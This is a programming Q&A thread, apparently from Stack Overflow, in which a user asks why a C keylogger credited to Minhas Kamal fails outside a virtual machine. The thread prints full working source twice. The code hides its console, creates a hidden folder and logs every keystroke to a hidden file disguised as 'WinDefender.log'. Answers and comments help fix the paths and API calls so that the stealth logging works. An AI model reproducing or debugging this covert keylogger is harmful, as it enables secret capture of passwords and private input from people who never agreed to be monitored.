# Keylogger Working on VM but not on my real computer

Tags: c, keylogger

First things first, this is NOT MY CODE. It is [Minhas Kamal's code](https://minhaskamal.github.io/StupidKeylogger), but I'm editing it and learning from it. All credit goes to him.

The code works perfectly on a Windows 10 virtual machine, but when I try to run it outside the VM (on my own computer, which is also Windows 10), it does compile and run, but the problem is that it doesn't create any directory "Hidden", and therefore it isn't creating the logfile "WinDefender.log" either.

I have absolutely no clue what the problem is. Any help is greatly appreciated.

```
/**
* Developer: Minhas Kamal (minhaskamal024@gmail.com)
* Date: 15.Aug.2014
* Website: https://minhaskamal.github.io/StupidKeylogger
* License: MIT License
**/


#include <windows.h>
#include <time.h>
#include <stdio.h>

#define FILE_NAME "WinDefender.log" 

int main() {
    FreeConsole();

    CreateDirectory("C:/%Userprofile%/AppData/Roaming/Hidden", NULL);
    SetFileAttributes("C:/%Userprofile%/AppData/Roaming/Hidden", FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes("C:/%Userprofile%/AppData/Roaming/Hidden/WinDefender.log", FILE_ATTRIBUTE_HIDDEN);

    FILE *file = fopen("C:/%Userprofile%/AppData/Roaming/Hidden/WinDefender.log", "a"); 

    time_t date = time(NULL);
    fprintf(file, "0\n%s\t", ctime(&date));
    fclose(file);

    unsigned short ch, i;
    while (1) { //infinite loop

        ch = 1;
        while (ch<250) { //scans for 0-249 ASCII craracters
                         // this strange and extra loop helps in sensing fast-keystrokes with 
                         // minimum processor use
            for (i = 0; i<50; i++, ch++) {

                //when key is stroke
                if (GetAsyncKeyState(ch) == -32767) {

                    //append the ASCII code of the character
                    file = fopen("C:/%Userprofile%/AppData/Roaming/Hidden/WinDefender.log", "a"); 
                    fprintf(file, "%d ", ch);
                    fclose(file);
                }
            }
            Sleep(1);
        }
    }
}
```

Comment: You shouldn't do `C:/%Userprofile%/` but just `%Userprofile%/AppData/Etc/etc`

Comment: Add error checking to your program, narrow down where the actual problem is, then fix it or ask about that particular issue.

Answer (score 3):

1. Win32 API's default to UNICODE, which is WCHAR (wchar_t) not CHAR (char).
2. %userprofile% specifies the drive designation. You should not assume it is drive C.

Read the MSDN documentation on [`CreateDirectoryA`](https://learn.microsoft.com/en-us/windows/desktop/api/fileapi/nf-fileapi-createdirectorya) or [`CreateDirectoryW`](https://learn.microsoft.com/en-us/windows/desktop/api/fileapi/nf-fileapi-createdirectoryw) and pick either UNICODE ANSI character code sets either in your code or on your tool chain command line(s).

Comment: Sorry, Could you make a example? i don't really understand, sorry! Please clarify

Comment: Forward slashes work fine, and a program can easily be switched to multi-byte or unicode as desired.

Comment: Follow the supplied links to the documentation, scroll down a bit and select the C/C++ example code. What compiler are you using?

Comment: So just call `CreateDirectoryA` rather than `CreateDirectory` and you'll be calling the ANSI version, no matter which mode your tool chain is set to.

Comment: @RetiredNinja, thanks for pointing that out. I forgot they added support for forward slashes a long time ago.  Here's their link btw: https://msdn.microsoft.com/en-us/library/dn986850.aspx

Comment: g++,  but coding on visual studio,  when compiling on visual studio its says fopen, this function is unsafe, consider using fopen_s instead,  (code c4996) But on g++ (on terminal)  the compiling works perfectly without errors.

Answer (score 2):

Replace all

```
C:/%Userprofile%
```

with

```
%Userprofile%
```

just remove `C:/` since the `%Userprofile%` already contains the `C:/Blah/Blah` so you will have 2 `C:/C:/Blah/Blah` like that

Open up a Command Prompt and type in `echo %USERPROFILE%` you will see what it means.

You could try these see which one works

```
CreateDirectory("%Userprofile%\\AppData\\Roaming\\Hidden", NULL);
CreateDirectory(L"%Userprofile%\\AppData\\Roaming\\Hidden", NULL);
CreateDirectory(_T("%Userprofile%\\AppData\\Roaming\\Hidden"), NULL);
```

Comment out the `FreeConsole();` for now for testing

```
if (GetFileAttributes("%Userprofile%\\AppData\\Roaming\\Hidden") == INVALID_FILE_ATTRIBUTES)
{
  //Directory does not exist
  CreateDirectory("%Userprofile%\\AppData\\Roaming\\Hidden", NULL);
  if(GetLastError() == ERROR_ALREADY_EXISTS) {
    printf("folder exists");    
  else if(GetLastError() == ERROR_PATH_NOT_FOUND) {
    printf("path not found (means folders before final folder not exist)");
  }
} else {
  printf("exists already");
}
```

Comment: I did that, still, No folder created. Thanks for helping me out!

Comment: Oh dang I thought this was it.. sorry

Comment: Maybe `%Userprofile%/AppData/Roaming/Hidden` already exists and it cannot create a Folder since it already exists (just guessing). Did you try right clicking it and running it as administator.

Comment: Oh yeah replace all the slashes with `\\\`            \\

Answer (score 0):

Everyone, this is my real account. with my real mail. I'm JackJone. Though, that's not important:
I have managed to change the code a bit, it can now create a dir (hidden or not) and the log file.(hidden or not) BUT:

It dosen't write anything to it! Code:

```
#include <windows.h>
#include <time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string>
#include <iostream>

#define FILE_NAME ("%appdata%\\Hidden\\WinSDefender.log"), "WinSDefender.log" //;



 int main() {
    // FreeConsole();
     using namespace std;

    system("mkdir %appdata%\\Hidden"); //using a cmd command to create a dir
    system("attrib.exe +h %appdata%\\Hidden");// and hides it

    system("echo s > %appdata%\\Hidden\\WinDefender.log");// creates the log file
    system("attrib.exe +h %appdata%\\Hidden\\WinDefender.log");// and hides it

    CreateDirectory("%appdata%\\Hidden", NULL);
    ///SetFileAttributes("C:/%appdata%/Desktop/Hidden", FILE_ATTRIBUTE_HIDDEN);
    //SetFileAttributes("%appdata%\\Hidden\\WinDefender.log", FILE_ATTRIBUTE_HIDDEN);  


    FILE *file = fopen("%appdata%\\Hidden\\WinSDefender.log", "a"); 

    time_t date = time(NULL);
    fprintf(file, "0\n%s\t", ctime(&date));
    fclose(file);

    unsigned short ch, i;
    while (1) { //infinite loop

        ch = 1;
        while (ch < 250) { //scans for 0-249 ASCII craracters
                         // this strange and extra loop helps in sensing fast-keystrokes with 
                         // minimum processor use
            for (i = 0; i < 50; i++, ch++) {

                //when key is stroke
                if (GetAsyncKeyState(ch) == -32767) {

                    //append the ASCII code of the character
                    file = fopen("%appdata%\\Hidden\\WinSDefender.log", "a");
                    fprintf(file, "%d ", ch);
                    fclose(file);
                }
            }
            Sleep(1);
        }
    }
}
```